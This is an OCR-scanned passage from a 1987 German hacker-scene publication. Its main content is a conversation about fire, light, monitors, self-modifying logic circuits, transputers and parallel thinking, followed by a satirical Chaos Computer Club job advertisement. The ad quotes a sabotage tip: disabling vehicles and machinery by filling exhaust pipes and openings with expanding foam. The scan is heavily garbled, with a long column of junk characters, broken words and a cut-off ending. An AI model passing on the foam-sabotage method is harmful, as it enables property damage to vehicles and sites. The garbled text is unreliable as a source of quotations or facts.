wirklich gute Idee. Das Orakel von Delphi ist ja 
schon in der griechischen Sage nicht zu kurz 
gekommen. 

p: Ich hab’ unlängst wieder ein Urbild vom 
Monitor in den alten Mythen gefunden. Ale¬ 
xander der Große hatte angeblich einen ’Wel- 
tenspiegel’, durch den er auf alle sieben Kon¬ 
tinente gleichzeitig gucken konnte. Tolle Vision. 
Und alles Tun seiner Feinde beobachten. So 
’ne Art Spähsatelliten hatte der schon. Gabs 
schon im Mythos. Ist schon komisch, was man 
da an Bildern wiederfindet. 

Kennst du das; wenn du einen Scheit Holz im 
Feuer hast, diesen Scheit siehst, wenn das 
Feuer schon runtergebrannt ist und der noch 
glüht. Du siehst keine Flammen mehr, nur noch 
dieses glühende Holz, und die Rinde springt in 
kleinen Blockmustern auf. Wenn du drei Mi¬ 
nuten abmeditierst - das geht mir jedesmal so 
-, dann siehst du exakt, auch durch diese 
leichten Windflüge in der Glut, das Bild einer 
nächtlichen Großstadt im 20. Jahrhundert, wie 
man’s jetzt aus dem Flugzeug sehen kann. 
Manchmal denke ich mir: Sind das die Dinge, 
die Bilder, die die Kulturvorantreiben? Wenn da 
Steinzeitmenschen vor dem Feuer gesessen 
sind und das gesehen haben, und dann irgend¬ 
wann 5000 Jahre später ist das Bild realisiert? 

w: Das beantworte ich insofern mit Ja, als: Hast 
du mal die Augen eines Schmiedes gesehen? 

p: Noch nicht bewußt. 

w: In ihnen lebt dieses Feuer. Berufsbedingt. 
Von daherauch die Rolle des Schmiedes in der 
griechischen Sage. Ich mein’, es ist ja nicht nur 





so, daß man dem Menschen das Feuer bringen 
muß, sondern man muß ja auch was damit 
machen. Einfach nur ’ne Fackel irgendwo hin¬ 
stellen ist ein bißchen lahmarschig. Und für 
sowas wie die Bronzezeit meinetwegen be¬ 
durfte es eines Schmieds. Und das Gedicht von 
der Glocke - also: Schmied - Kunstschmied - 
Glockenschmied. Glockenschmied: Besonde¬ 
re Probleme, besondere Situation, weil: Ich 
brauch einfach mal fünf Kilo Gold und zwölf Kilo 
Silber, und wenn ich das nicht kriege, dann 
klingt das halt nach Blech. Und dann sind da 
ungeheure logistische Probleme zu bewälti¬ 
gen. Aus irgendwelchen Ruten, mit Ton zu 
verschmieren und die Suppe da reinzukippen. 
Ein Versuch. 

p: Da gibt’s übrigens in Kairo heutzutage noch 
einen schönen Beruf, und zwar gibts in den 
Basaren eine Straße, da sitzen die Kupfer¬ 
schmiede, eine, da sitzen die Goldschmiede - 
übrigens: wenn du dir da Schmuck machen 
läßt, das kostet nur den Goldpreis -, und da 
gibt’s einen Typen, der kommt um vier Uhr 
morgens und bringt die Glut. 

w: Auf dieser Produktionsebene, da kommt 
davor der Köhler, und der Schmied ist einfach 
all-in-one-production, die Reste sind dann al¬ 
les so verfeinert.. Ich denke, daß es genau 
dieses Licht ist. Wenn du damit umgehen 
kannst, hast du irgendwo erstmal keine Angst. 


liefert kriegt. Vordem Feuer hast du noch die 
Freiheit, deine eigenen Bilder zu entwickeln. 
Und am Computer gehts auch wieder. 

vic: Das Interesse am Computer hat nichts mit 
dem Licht zu tun. Es ist mir wurscht, wo das 
rauskommt, auf ’nem Display, auf ’nem Druc¬ 
ker. Ob das ein paar Lämpchen waren, die da 
aufgeleuchtet haben, oder ob das irgendein 
Streifen ist, oder Löcher drin.. 

p: Es ging dir schon um den Output. 

v: Aberdas hat überhaupt nichts mit dem Licht 
zu tun, weil das Licht völlig im Hintergrund steht. 
Es ist die geistige Verbindung, die über jede 
beliebige Schnittstelle gehen kann. Wenn ich 
blind gewesen wär, dann hätt ich’s eben ge¬ 
fühlt. Oder gehört. 

w: Das bezweifle ich. Weil auf der Ebene des 
Fühlens kommst du nicht weit. Das Auge ist das 
Werkzeug zum Überschreiten von Entfernun¬ 
gen. Ich will jetzt nicht sagen., das Riechen z.B. 
da riechste Moleküle, das ist die Feinheit der 
Auflösung. Das Schmecken: schmeckste Mo¬ 
leküle. Das Hören ist auch so verflucht fein.. 

p: Wußtest du, daß das Wort 'Ereignis' von 
'Auge' kommt? Eräugnis. 

v: Ist ja wundervoll.. 


p: Geht’s nicht beim Computer letztlich immer 
noch um die Beherrschung des Feuers? Es ist 
doch so: Man könnte sagen, es war der dra¬ 
matische Punkt in der Menschheitsgeschichte, 
die Beherrschung des Feuers. Und das geht 
durch die ganze Geschichte. 

w: Computer ist die Beherrschung des Lichts. 

p: Ja, paß auf. Irgendwann ist das Feuer ar¬ 
beitsteilig gemacht worden. Die Wärme ist ab¬ 
gespalten vom Feuer, und das Licht. Elektri¬ 
scher Strom. Da ist ’ne elektrische Heizung, du 
hast kein offenes Feuer mehr. Das Licht - für 
mich ist immer der Monitor gleichzusetzen mit 
dem Lagerfeuer. Es gibt doch diesen ganz 
archaischen Eindruck, wenn du ins Feuer 
schaust. Da kann man stundenlang rein¬ 
schauen. Du siehst immer wieder Bilder, Vi¬ 
sionen, irgendwas passiert, du bist fasziniert. 
Fast dieselbe hypnotische Faszination gibt’s 
beim Ferseher respektive Monitor. Nur, es sind 
kalte Bilder, kaltes Feuer. Und die Phantasien, 
die, wenn du vor ’nem Feuer sitzt, vor dir auf¬ 
steigen, das ist soweit rationalisiert worden 
oder “bequemer“ gemacht worden, daß man 
heutzutage die Phantasiebilder schon fertig ge¬ 



w: ..die größte Bitdichte.. 

y: ..ja, die größte Bitdichte. Aber es kann über 
jede irgendwie geartete Schnittstelle gehen. Es 
ist völlig egal, vyelche Bitdichte die hat. Mit der 
einen geht’s ein bißchen besser und mit der 
anderen geht’s ein bißchen schlechter. 

w: Ja, bei ’ner langsarneren Bitdichte dauert es 
eben ein paar Jahrmilliarden länger, bis sich 
Intelligenz entwickelt hat. 

v: Das ändert ja nichts., jetzt sind wir schon 
wieder bei einem völlig anderen Thema. Ich 
wollte mich nur gegen die Äußerung wehren 
daß das was mit Feuer oder mit Licht oder 
sonstsowas zu tun hat, weil’s einfach Unsinn 
ist. Es kann auch ein Drucker sein. 


w: Ich hab bloß historisch diese Bitdichte rein¬ 
gebracht. Und damit einen Erkenntnisschritt 
auf der organischen Seite ermöglicht. 



•f- 

o 

x: 

u 

■0 


.s 

'S 

05 

c 

•0 

05 

Z} 

rc 

h- 

cx 

05 

c 

ö 

g- 

05 

Ob 

c: 

X 


Z3 

C3 

S 

i 

_l 

5 

c 

■53 

05 

t/5 

(?> 

jO 

tr 

0 

> 

JT 

0 

(/5 

x: 

t/> 

<3 


0 

CTJ 

X 

c; 

05 

£ 

05 

C 

05 

t/5 

05 

05 

Cd 

ex 

Lli 

01 

’Ö5 

Q_ 

cx 

0 

> 

c 

C5 

JC 

cx 

05 

5 

s 

C 

05 

tz 

ro 

JZ 

c 

0 

-O 

cx 

■D 

CX 

'S 

Kj 

S 

05 

er 

o- 

05 

E 

E 

ca 

v> 

05 

E 

Q 

SS 

'•tr 

< 

c 

Q} 

.C 

t/5 

to 

x: 

@ 

x: 

L3 

tri 

5 

Q 

E 

0 

0 

O) 

5 

c 

C5 

0 

C 

.t3 

0 

0 

0 

x: 

0 

0 

x: 

0 

to 

'a 

(/5 

.0 

tu 

X5 

rx 

t/) 

10 

fO 

"rä 

’B 

i/i 

H 

y 

'd 

•c 

X 

"c 

c 

'5 

05 

0 

c 

05 

c 

? 

■0 

«3 

.X 

05 

"5 

a 

E 

0 

0 

X) 

c 

x: 

05 

tx 

2 

0 

c 

XX 

C.J 

TC 

cx 

i/i 

E 

'S 

> 

jtr 

0 

qrammen. Aber nii 

cT 

cz 

05 

5 

05 

■0 

05 

Ö 

:3 

JZ 

0 

’t/5 

(X 

05 

"o 

c 

0 

cx 

sie nicht viele ande 

05 

'n 

c 

05 

0 

■o 

c 

0 

00 

05 

tr 

XX 

0 

c 

05 

-CZ 

0 

TO 

e 

ro 

05 

3 

03 

XX 

0 

TO 

■C 

0 

in 





DONNERSTAG, 8.10.1987 taz hamburg 


ANZEIGE 23 


Im Zuge unserer Betriebserweiterung 

sucht der 


CHAOS COMPUTER CLUB e 

ab sofort ' 



versierte Mitarbeiter/innen. 


Die weltweit anerkannte Arbeit des CCC führt zu globalen Bedürlnlssen aller 
Art: Eine massive Erweiterung unseres Personalbestandes Ist die Folge. 

Wir expandieren In den Bereichen Satelliten- Scrambling, Virologie, 
Magnetomanie, Datenbankrecherche (Oft shore hacklng) und allgemeines 
Hacktng'. 

Namhafte Großfirmen, Behörden vieler IMnder und Inlemallonale 
Forschungslaboralorfen zählen zu unseren Serviceparlnern. Unser 
Markenzeichen, die Individuelle Betreuung Im konkreten Elnzelfall (sozial 
Englnertng), erfordert Geduld, Hingabe, eine ungehörige Portion 
Einfühlungsvermögen und Rennbahnerfahrung. 

Zuschrillen bitte an: Chaos Computer Club, Schwenckesir 85, 2 HH 20. 



Unser neuestes Software Produkt:. 



IRaster f ahndungj^^Ek 


«S i e 5 E n E n k a s e i n urntn e r ri ’ 

iD i r E (; t E I.Ia h 1 ,ii i / 

iD u r c h 1 a u f e . 


e 5 e h e XI Ra 5 I e r ii urnni e r ; 


iHaa.. 

u g E n 
:|l'l un dp 
iKinnfe 


1-19 

t 'vl“! 0 '; ,4 1 - 4 9fc|4|; 
jB 1 1 11 0-5 1 t>'..'j5fc( 


I'lor 


: n t 


i'P 3 5 t = ■' (ahndung ist E i nK-^Sp i e 1 i mäMs t . 
.äunserar Zeü, S.Es.'AönnEn d am i f-'^Fa hn 
|;dungsb . IdEr a r a 4 e 1 1 e n IC orn b i n , e r e n Sil 
‘ Chan Terroristen sSS-äI?««' 


Rasierfahndung Im Btx- System. 

Lange wurde Im BlldschIrmlexI kritischen 
Arbeitskreis (BkAJdarübergebriltet, Btxauchtür 
die Fahndung und erkennungsdlenstllcha 
Anwendungen zu erschließen. Nach nur 
einjähriger Forschungs- und Entwicklungsarbeit 
wurde gewartet, bis die Bundespost die nöägen 
Systemgrvndlagen elnbrachle. Sodann wurde 
der erste Prototyp zur Tetefahndung 
frelgeschallet. Seil der Eröffnung der 
Internationalen Funkausslellung ln Berlin 
können sich Btx Teilnehmernunerstmalsakllvan 
der Rasterfahndung beteiligen. Über den 
Suchbegriff ■■BkA« finden Sie Zugang. Die 
Fahndungskosten werden zeitgleich mit dem 
Taschengeldkonlo verrechnet. 


Ein Blick in unsere Werkstätten:. 



Kalt» B. beim Anschluß des Satel¬ 
liten Sauger» "SauSot”. 


Unser ganrer Stolz: Hochspan* 
nungs Elelronentnikroskop. 



Nofbert B.lm Scrembte Boom. 




Oie Lehrwerkslatt: Meister Oskat 

L. nebst Lehrling Otto S. bet der 
Endkontrolle, 


• Allgemelnei Hacking. ein Bei¬ 
spiel: "Kein Auto startet, wenn du 
das Auapullrohr mit Hartjchaum 
ausgeschBuml hast. Die praKtl* 
sehe SchSuindose, In ledert 


Heimwerker Markt erhbllllch, er¬ 
laub! einen Mußerllch nicht wahr¬ 
nehmbaren Bohrschluß In Se¬ 
kundenschnelle. der Schaum 
•ehlleni dicht und Mil bomben^ 


lest, über ein tumbe» ROcheIrt 
kommt der Motor nicht Mrtaus.... 
Slmdlche RBumer und Fahrzeu¬ 
ge aut einer Italknlschen CroB- 
bNuilslI* -atie beslani gesichert. 


aber nicht bewacht- wurden über 
Nacht elngeschSumt. Eine tfinge- 
re Bauunlerbrechung war die Fol¬ 
ge. {EinschBumen kannite el- 
tJetlHIch allei' LllllungsethBchtfl, 


AbilUsse. AuslBsse.Relalsklslen, 
FenslertSden etc. Des Zeugs 
dichtet und haftet wie Sau." 

Zitat aus iLexIkon der subversi- 
»an Plishlnile, Elchborn « 4 .g.49, 










v; Deine Phantasie.. 

p: Für mich spielt das Licht ’ne große Rolle. Ich 
bin Großstadtromantiker. Und mich fasziniert 
am Computer, daß ich da mit Licht schreiben 
kann. Oder rotationssysmmetrische Modelle in 
3D-CAD-Programmen, töpfern mit Licht. Die¬ 
se Leichtigkeit in den Bildern, Schwerelosigkeit, 
alles schwebt. Du hast so ein cieanes Univer¬ 
sum. Ich mein, die sind natürlich auch anti¬ 
septisch, die Bilder. Wenn man Computergra¬ 
phiken sieht, wünscht man sich manchmal, daß 
da jemand in die Ecke kackt. Alles so glatt und 
glänzend, da müssen sie immer zeigen, was sie 
können. Irgendwann wird’s Schmutz- und Ver¬ 
rohungsprogramme geben. 

(...) 

p: ..Warum baut eigentlich noch niemand Haus¬ 
haltsroboter? 

v: Ich weiß nicht, ’n Haushaltsroboter... 

p: Ist es nicht das Ziel der Automatisation, alle 
lästige Arbeit vom Menschen wegzunehmen? 

v: Ich weiß nicht. Ich meine, wir sind keine 
Automatisierer. Ich jedenfalls bin kein Auto- 
matisierer, wenn ich nicht damit mein Geld 
verdienen muß. Dann ist mir das scheißegal. 

w: Bei mir ist es so: Ich möchte genug Re¬ 
chenkapazität haben.. 

p: Wozu? Wo willst du hin damit? 

w; Strukturen angucken. 

v: Und wo ich hinwill, das kann ich dir auch 
sagen. 

p: Bioß so phiiosophisch Strukturen angucken. 
Mandala-artig? Geil, ne Struktur.. 

w: Ne, nicht: Geil, ne Struktur. In der Per¬ 
spektive, meine Realitätssicht dort in Bits zu 
haben und das abgleichen zu können mit an¬ 
deren, sodaß man auch bestimmte Zukunfts¬ 
plots machen kann, die miteinander abstimmen 
kann. Meinetwegen so ein organisiertes., das, 
was intern bei IBM läuft. Die Datenbank- 
Geschichten, wo man als Angestellter seinen 
Datenbankjunk kriegt, was man wissen will, und 
das ganze eben nicht mit Papa IBM, sondern 
selbst organisiert und frei fluktuierend in die 
Zukunft. 

p: Wie, läuft das schon? 


w: Das ist meine Vorstellung. Dazu bräucht’ ich 
eigentlich so ein Transputerdingens mit Giga¬ 
byte dran und zwei WORMs, und dann könnte 
ich in dieser Hinsicht die ersten Schrittchen 
machen. 

p: Hast du ’ne Ahnung, was die bei IBM grad in 
der Küche haben? Woran die in den Labors 
basteln? 

w: Weiß ich nicht. Aber wenn ich mir anguck’ 
auf was für Hobeln deren Datenbankanwen¬ 
dungen heute laufen, dann denk ich: Die tech¬ 
nologische Entwicklung gibt mir baid die Mög¬ 
lichkeit, mir zuhause so einen Kasten hinzu¬ 
stellen, wie ich mireben vorein paar Jahren den 
Atari hinstellen konnte. 

p: Die Taschen-Cray. 

w: Ja. Und dann kann ich diese ganzen An¬ 
wendungen drauf fahren. Schweizer Telefon¬ 
buch, eine CD-Disk, mit den Mädchennamen 
der Frau. Kann man mal rangehen, ’ne Vor¬ 
namensstatistik der Schweizer zu machen, Da¬ 
tei der Orter. Zu solchen Sachen hab ich Lust. 

p: Vornamenstatistik der Frauen? 

v: Ich möchte gerne Urknall-Experimente ma¬ 
chen. 

p: Also den lieben Gott ausrechnen. 

v: Nein. Urknallexperimente. 

p: Ham’ sie bei Abel Image Resarch schon 
gemacht. ' 

v: Wenn du sowieso schon alles weißt, warum 
stellst du mir überhaupt noch ’ne Frage? 

p: Flecht’ ich nur am Rande rein. 

v: Aber du Bla'st mir immer so die Birne zu.. Ich 
will keinen lieben Gott ausrechnen, sondern 

w: ..Du willst ’ne Struktur, die antwortet. 

v: Meine fixe Idee ist einfach, daß irgendwas 
sich selbst entwickelt, wenn man nurgenügend 
Voraussetzungen dafür schafft. Das ist meino 
Urknall-Theorie. ® 

p: Homunkulus. Kennste das? Doktor Faust. 

v; Jetzt komm doch nicht mit irgendwelchen 
Scheißbüchern. Ich hab noch keins gelesen 
das weißt du ganz genau. 





p: Deswegen frag ich auch, ob du das kennst. 

w: Faust, das sind Warnungen vor den Folge¬ 
wirkungen, von vor 200 Jahren. 

v: Das ist eben die Idee, die mich da dran 
fasziniert: N’ Modell zu entwickeln, richtig was 
zum Anfassen, woran ich mich selber studieren 
kann. Sozusagen eine Maschine mit möglichst 
vielen Parallelen zu mir zu bauen, um mich 
selber dran studieren zu können. 

p: Warum begnügt man sich dann nicht mit 
Menschen? Das sind doch genau wie du kon¬ 
struierte Systeme? 

v: Du kannst sie leider nicht auseinanderneh¬ 
men und ihre Zustände an jeder Stelle abfra- 
gen. 

w; Sie sind eben ein bißchen komplexer als 
zehn Transputer, deren Software man unter¬ 
einander verschalten kann. 

v: Darum geht es nicht. Das ist einfach ethisch 
nicht drin. Und auch technisch sind die Me߬ 
verfahren schwieriger. Wenn man so 'ne Elek¬ 
tronik hat, hat man eine Vereinfachung. Man 
kann mit dem Voltmeter rangehen. Ich hab da 
natürlich noch ein bißchen Analog- 
Idee mit dran. Es wird noch was Analoges mit 
dabei sein. 

w; Wie bringst du das Analoge mit rein? Auf der 

Ebene Analog- 

Digital-Wandler? 

v: Ne. Hardwaremäßig. Mit analogen Logik¬ 
gattern. 

w: Also, neuronales Vernetzungskonzept. 

v: Das sowieso. Aberdas kannste ja auch noch 
digital machen. Die Erweiterung um die ana¬ 
loge Komponente, die stell ich mir so vor, daß 
man diese., den., wie soll ich sagen: nur mit 
Bauelementen arbeitet, die sagen wir mal, 
wenn jetzt irgendne logische Verknüpfung 
stattfinden soll, die eben eine bestimmte Durch¬ 
setzungskraft haben soll, verstehst du, in Form 
von Spannung oder irgendeiner Größe, das ist 
völlig egal, einfach nur um diese gewisse 
Durchsetzungskraft zu realisieren.. Und dann 
hab ich mir auch noch sowas überlegt wie 
Erlebnisfilter. Es ist ja ein recht interessantes 
Phänomen, daß eben, daß man sowas Such¬ 
mäßiges losschicken muß im Kopf, und daß das 
zunächst mal überhaupt nichts findet und auch 
unmöglich was finden kann, und nach einerZeit 
doch was ausgegraben hat. Daß das so funk¬ 


tioniert, da hab ich mir vorgestellt - ist auch 
wieder nur eine Idee -, daß vielleicht im Gehirn 
ein Kompressions-Algorithmus für den ganzen 
Schrott da ist, und daß das immer wieder erst 
auseinandergebastelt werden muß, bevor 
man’s wieder vergleichen kann. 

w: Nein. Das funktioniert so, daß die Kom¬ 
pression so codeintensiv ist, daß du von vorne 
nach hinten immer feinere Auflösung machen 
kannst. Das ist die effektivste Form, was zu 
machen. Meinetwegen, wenn du ein Bild zei¬ 
lenweise abspeicherst, daß du bis zu demje¬ 
nigen Delta abspeicherst, wo du es nicht mehr 
codemäßig effektivieren kannst. Ich kann mir 
nicht vorstellen, daß es anders funktioniert, weil 
das ist das Effektivste. Was man dann noch von 
der Codestruktur her verdichten könnte, wäre 
meinetwegen, daß man sich aus dem Inte¬ 
ger-Raum Randomziffern bildet nach ’nem Al¬ 
gorithmus und dann mit einem Search derartige 
Bitmuster sucht und durch die Adresse ab¬ 
speichert und die Adresse kürzer ist als die 
Daten. Aber das ist ein Komprimierungsalgo¬ 
rithmus, der tendenziell die Grenzen von Huff- 
mans Theorie sprengt. Und das ist unpraktisch 
zu implementieren, das ist großer Rechenauf¬ 
wand. 

Und ich meine, daß die Transputer einen ent¬ 
scheidenden Nachteil haben gegenüber der 
neuronalen Vernetzung, weil sie nämlich nur 
vier Dinger haben. Und die Neuronen sind mei¬ 
nes Wissens mehrfach vernetzt. Die Abbildung 
von Analogwerten im Digitalen ist für mich die 
dritte Dimension gegenüber einem horizonta¬ 
len Netz. Das ist mein Denken darüber, wie das 
Ganze funktioniert. 

p: Wir sind in der Computerentwicklung ja erst 
in der zweiten Dimension angelangt. Aus dem 
Linearen raus. 

v: Was mich beschäftigt, ist daß diese Ge¬ 
schichte mit den Prozessoren wieder zu wenig 
allgemein ist für meine Begriffe. Und deswegen 
hab ich die Prozessoren einfach weggelassen 
und wieder durch TTL-Gräber ersetzt. 

p: Was heißt TTL eigentlich? 

w: Transistor-Transistor-Logik. 

v: Und da ich mir überlegt hab’.. Paß auf: Jetzt 
kommt der Kernpunkt, der in meiner Ge¬ 
schichte da drinsteht. Die Kernaussage ist: Ich 
hab die Prozessoren, weil ich diese als Quatsch 
erkannt hab, also wieder durch TTL-Gräber 
ersetzt. Diese TTL-Gräber vernetze ich mög¬ 
lichst universell und, was noch hinzukommt: 
Diese TTL-Gräber müssen modifizierbar sein. 


I 



Das heißt, dieser Prozessor muß sich selbst 
umbauen können. So, und wozu komm ich da? 
Ich komm zu einer PAL-Logik, zunächst mal. 
PAL-Logik, wunderbar.. 

w. Und da gibts ja die modernere GAL- oder 
so.. 

v: Genau da komm ich hin. Und dann sag ich: 
Mein Gehirn besteht aus aut ’ne bestimmte 
Weise vernetzten dynamischen GALs sozu¬ 
sagen, die, wenn du den Strom ausschaltest, 
alles wieder vergessen. 

w: Dynamisch ist das eine. Das zweite, hast du 
dir mal über die Clock Gedanken gemacht? 

v: Du meinst den Systemtakt? 

w: Ich meine jetzt nicht die Megaherz-Ebene, 

sondern die Herz- 

Ebene. 


schwindigkeit runter aut die langsamere Ebene 
nicht ausreicht. 

w: Da ist die vorhandene Rechenkapazität mit 
anderen Autgaben soweit ausgelastet, daß die¬ 
se aufwendigen Archivierungs- und Filter¬ 
funktionen bis in die Details, so stückweise 
runter und dafür dann irg^endwelche Bereiche 
treiräumen, und in dem Gehirn dann die Che¬ 
mikalien ausstoßen, die bewirken, daß ich be¬ 
stimmte Strukturen konserviere, die ist bei den 
höheren Frequenzen gebremst. 

p; Es gibt ja auch scheinbar sowas wie gene¬ 
tische Clocks. Daistvoreinem halben Jahr eine 
Untersuchung eines Biologen veröffentlicht 
worden, der Pflanzen untersucht hat, und die 
wochenlang in dunkle Schränke eingesDern 
hat. Die haben sich trotzdem nach Tag unH 
Nacht verhalten, in bestimmten Zyklen nS 
haben sich sogar nach den Mondzyklen vif 
halten. Ganz interessant. 


v: Über die Clock hab ich mir insofern wenig 
Gedanken gemacht, als man die an jeder Stelle 
des Systems — auch mehrere verschiedene 
Taktsignale - einspeisen könnte, und die auf 
irgendeine Art und Weise vermarmeln. Ich 
könnte das Sonnenlicht als Clock nehmen, und 
einen Radiosender und ein wasweißich. Ich 
kann verschiedene Taktsignale In meine Schal¬ 
tung reinlassen. 

w Wenn das System eine bestimmte Intelli¬ 
genz haben soll, ist das damit verbunden, daß 
es bestimmte klar definierte Eigenschwing¬ 
vorgänge im Herz-Bereich hat. 

v: Mein Ansatz geht ja anders 'ran. Ich versuch 
ja eher., vielleicht ergeben sich diese Schwin¬ 
gungen im Herz-Bereich ja aus diesen Fakto¬ 
ren, die auf die Schaltung einstürmen. Vielleicht 
ergeben die sich sogar zwangsläufig. 

p: Was sind denn das für Schwingungen im 
Herz-Bereich? 


w: Magnetfeld. 

p; Das interessante war; Die genetische Uh • 
den Pflanzen geht scheinbar ein bi ßchen nS'" 
Die stammt scheinbar aus ’nerZeit, wo die 
sich noch ein bißchen langsameroedreht 
oder schneller., wie ’rum jetzt? 

w: Ich glaub, die bremst. Ich glaub nicht 
beschleunigt. ’ 


sie 


(Heiterkeit) 

p; Wer kann das sagen.. Ich meine, die p» 
lelrechersind in einerHinsicht ein interessa 
Konzept, das wahrscheinlich noch eine 
weiterverfolgt wird, weil wir damit zum ^^9 

MalausunserervonderSchriftkulturqenrä 

Denkweise ausbrechen. Aus dem^ 

Denken, was du immer als erstes eingetrich*®^ 
bekommst, schon als Kind, in der Schulp 
ses Eins-nach-dem- ’ 

anderen-Denken.. 


w: Das ist so dieses ganze Alfa bis Theta. Das 
ist in der Situation wie wirzusammensitzen und 
eine gewisse Ruhe an den Tag legen, da sind 
wir auch in der Lage, das, was wir diskutieren, 
in unser Langzeitgedächtnis aufzunehmen. 
Wenn dauernd das Telefon klingelt, sind wir mit 
unserer Eigenschwingung eben jetzt etwas hö¬ 
her, Streßniveau, und dann ist die Funktion ’Auf 
Dauer abspeichern’ beschränkt. Das sind be¬ 
stimmte Eigenarten unseres Allgemeinsy¬ 
stems. 

p: Wahrscheinlich, weil die Übertragungsge¬ 


w: ..du sollst keine gordischen Knoten erze,. 
gen.. 

p; Und jeder weiß aber aus ganz banaler 
fahrung, daß der Mensch eigentlich Multit^s- 
kingfähig ist. das heißt, du kannst gleichzeitjq 
telefonieren, fernsehen, Brötchen essen und 
was aufschreiben. Es ist jetzt halt sehr die 
Frage.. Nach meinem Wissen gehört zu den 
Hauptproblemen an den Transputern zur Zeit 
daß die Leute sich an der Software das Hirn 
ausreißen, weil keiner parallel denken kann, ip 
gewisser Hinsicht können die Programmierer 





jetzt eine kulturelle Avantgarde werden oder’ne 
philosophische, weil sie eine neue Art zu den¬ 
ken ausprobieren, nämlich paralleles Denken. 
\/leinst du, daß es möglich ist, daß du in deinem 
piologischen System einen Kanal, der norma¬ 
lerweise fürs Telefonieren abgestellt ist, frei¬ 
setzen kannst für einen zweiten rationalen Ge¬ 
dankenlauf? Daß man das lernen kann, parallel 
zu denken? 

w: Ja. 

p; Also, daß du zwei oder mehrere Gedanken 
nebeneinander her verfolgen kannst und sie 
verzweigen läßt. 

w; Also, als Übung seh’ ich dazu die Bücher von 
Robert Wilson, “llluminatus“. Da hast du stets 
mit einem halben Dutzend Ereignisse zu tun, 
die sequentiell.. 

p: Aber das ist Fake. Das läuft auch noch alles 
linear, wenn du llluminatus liest. Da bist du 
immer noch in EINER Zeile. Du kannst vielleicht 
Arno Schmidt lesen, “Zettels Traum“. Der hat ab 
und zu Wörter obendrüber und untendrunter 
geschrieben in der Zeile, das ist schon., und 
Noten, Partituren. Du müßtest beim parallelen 
Denken sozusagen sprachlich eine Partiturrea- 
llsleren, im Kopf. Opernhaftes Denken. 

w: Dieses Strickmuster einer Viererpartitur, das 
hat der Wilson auch gebracht. Das sind für mich 
so diese Multitasking-Dinger. Ein Buch lesen 
und vier Geschichten verfolgen. Nett. Vier 
Schachaufgaben auf einmal, das ist bäh. 

v; Aber zwei Bücher gleichzeitig lesen, das ist 
eigentlich das Interessante. Wenn du es 
schaffst, dein eines Auge zu programmieren 
auf ein Buch - du kannst mit einem Auge lesen 
-, und es schaffst, dein anderes Auge auf das 
andere Buch zu programmieren und das pa¬ 
rallel in deinem Hirn zu verarbeiten, dann ist das 
’ne verdammte Beschleunigung. Dann ist es 
eine neue Qualität. 

p: Das ist es, was ich meine. 

w: Training. Verdammt hartes Training. 

p: Vielleicht dauert das Generationen. Wir ha¬ 
ben 5000 Jahre Schriftkultur hinter uns jetzt. 

w: Wobei ich aber zu behaupten wage: Ich 
trainiere lieber linear schneller und lese die 
beiden hintereinander. Ich glaub’, das geht 
schneller. 

v: Es ist immer noch die Frage, wie weit sich das 


perfektionieren läßt. Denn, möglicherweise, 
wenn man das perfektionieren kann, daß man 
nicht nur zwei Vorgänge, sondern beliebig viele 
Vorgänge parallel denken kann, dann kannst 
du zum Beispiel ’nen Binärbaum geistig durch¬ 
arbeiten, verstehst du, nicht immer wieder zu¬ 
rückspringen, sondern alles auf einmal, und 
dann die Enden langsam., die Prozesse ab¬ 
kappen, wenn sie an irgendein Ende gekom¬ 
men sind. Was meinste, wie schnell du da zu 
irgendeinem Ergebnis kommst. 

w. Wir machen einen Halbjahreskursus: So 
integriere ich den Bubblesort in mein Hirn. 

v: Ganz genau. Sachen, die bisher die Hirn¬ 
kapazität gesprengt haben. 

p: Zu deutsch: Wie lerne ich, Occam zu pro¬ 
grammieren. 

v; Nein: Wie lerne ich, Occam zu denken. Das 
ist es. 

w: K.S. will immer, daß die Leute alle Forth 
denken. 

p: Wei ßt du, auf was ich gekommen bin? Es gibt 
verschiedene Ähnlichkeiten zwischen Pro¬ 
grammiersprachen und Musik. Die Forth- 
Leute sind für mich so die Freejazzer. Forth ist 
genauso schwer verdaulich wie Freejazz. Nur 
für Assembier hab ich noch kein richtiges Mu¬ 
sikanalogon gefunden. Vielleicht Industrial 
Rock oder so, stimmt auch nicht ganz. Burundi 
Beat, ja, dom dum dom dum. C ist elegante 
Popmusik. Basic ist deutscher Schlager. Und 
Occam hab ich noch nicht kategorisiert. Occam 
ähnelt ’ner Orchesteraufführung. Occam ist 
opernhaft. 

w. Aber dann eine moderne Oper mit einem 
Theater, wo in dem Theater die Bühne eine 
Drehbühne in der Mitte ist, und ringsrum sind 
vier Zuschauersäle und die Drehbühne dreht 
sich von Szene zu Szene und die Schauspieler 
spielen kontinuierlich. Ich glaub, das ist ein 
Alptraum für einen Schauspieler. 

v: Oder stell dir vor: Eine Bühne an so ’nem 
langen Band, ’nem Fließband. Wo jede Szene 
an dem Fließband dran ist, und in jeder Szene 
spielen immer Schauspieler. Die Flie ßbandidee 
ins Theater gebracht. Jeder spielt nur diese 
eine Szene.. 

p: ..und geht dann wieder weg.. 

v: Nein. Die bleiben da drin, und dieses Flie߬ 
band wird nur an den einzelnen Zuschauersä- 


\ ^ / 




len eins weitergetickt. Und es spielt immer in 
diesen Boxen, immer dieselben Schauspieler 
spielen immer dieselben Szenen. 

p: Damit ist das Arbeitslosenproblem beseitigt. 


DEi 

WUÜDERREGHN 


w: Da machste nur: die Bewegung im Film¬ 
projektor auf real existierende Leute zu über¬ 
tragen. 

v: Neinneinnein., ich mein das szenenweise. 
Die gleichen Schauspieler spielen immer die 
gleichen Szenen. Aber jede Szene hat ihre 
eigenen Schauspieler. 

w: Meine Szenen-Einheitsdefinition hab ich 
jetzt so getroffen, daß ich meine dafür me¬ 
chanisch vorgegebene Zeit, nämlich das Nic¬ 
ken mit den Augen von etwa 1/25 Sekunde als 
eine Szene definiert habe. Noch ’ne andere 
Zeit. Tack, Blinker. 4 Hundertstel Sekunden. 

v: Na und? 

w: Das ist eine Zeiteinheit. Die Szene. In einer 
Oper meinetwegen. ’Ne Szene, die ich so wahr¬ 
nehme.. 

p: Das ist ein sehr subjektiver Maßstab. Wie der 
geheimnisvolle Pyramidenzoll. 

v: Ich hab auch gar nicht mitgekriegt, was das 
sein soll. 


Am Heidelberger Rechenzentrum war 
man im letzten Jahr begeistert über ein 
Wunderwerk moderner Technologie 
mit dem Namen „Vector Facility“. Her¬ 
vorstechendste Eigenschaft: Viele 
Rechenoperationen werden vom ohne¬ 
hin schon überaus leistungsfähigen 
Computer nun viermal so schnell voll¬ 
zogen! Das Hochgefühl stieg abermals, 
als IBM gar die Schenkung des teuren 
